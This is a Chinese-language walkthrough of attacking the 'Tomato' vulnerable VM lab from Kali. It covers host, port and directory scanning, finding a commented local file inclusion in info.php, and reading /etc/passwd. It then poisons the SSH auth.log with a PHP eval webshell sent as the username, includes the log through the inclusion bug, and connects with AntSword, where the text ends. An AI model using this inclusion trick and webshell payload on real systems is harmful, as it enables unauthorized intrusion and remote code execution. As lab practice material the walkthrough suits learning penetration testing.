前提：kali和tomato的连接方式都为net模式

tomato的默认网络连接方式为桥接模式，导入前注意修改，将tomato.ova的镜像导入虚拟机中

出现此页面则表示导入成功，打开kali虚拟机终端，切换为root权限

arp-scan -l

浏览器访问此ip

查看源码，没有任何思路

首先使用御剑扫描后台

没有任何发现，然后使用御剑端口扫描工具扫描端口，这里选择端口列表时为：1-10000

分别访问，发现还是没有思路

在kali中使用dirb工具

dirb http://192.168.164.145

尝试浏览器访问

http://192.168.164.145/antibot_image/

依次查看所有php文件的源码，看看有没有什么不同的地方

当访问到info.php的源码时，发现一个被注释的get型文件包含漏洞，参数为image

http://192.168.164.145/antibot_image/antibots/info.php

从此页面phpinfo中可以发现使用的是linux操作系统，在URL后面输入 ?image=/etc/passwd （用image参数传入想要获取的文件路径），成功显示，说明存在文件包含漏洞

http://192.168.164.145/antibot_image/antibots/info.php?image=/etc/passwd

我们在前面用御剑端口扫描工具扫描端口是有一个2211端口，猜测可能是ssh服务的端口

kali终端使用以下命令

ssh "<?php eval($ PosT[123]);?>"@192.168.164.145 -p 2211

、

木马写入失败（和kali版本有关，这里我的写入失败，但是可以尝试一下），我们尝试使用另一种方法：xshell

再点击‘用户身份验证’

然后点击‘连接’，这里会显示连接失败，这是正常的

我们返回浏览器，访问日志文件 /var/log/auth.log

http://192.168.164.145/antibot_image/antibots/info.php?image=/var/log/auth.log

查看最后一行有没有密码错误的日志记录，如果有，表示木马上传成功

蚁剑连接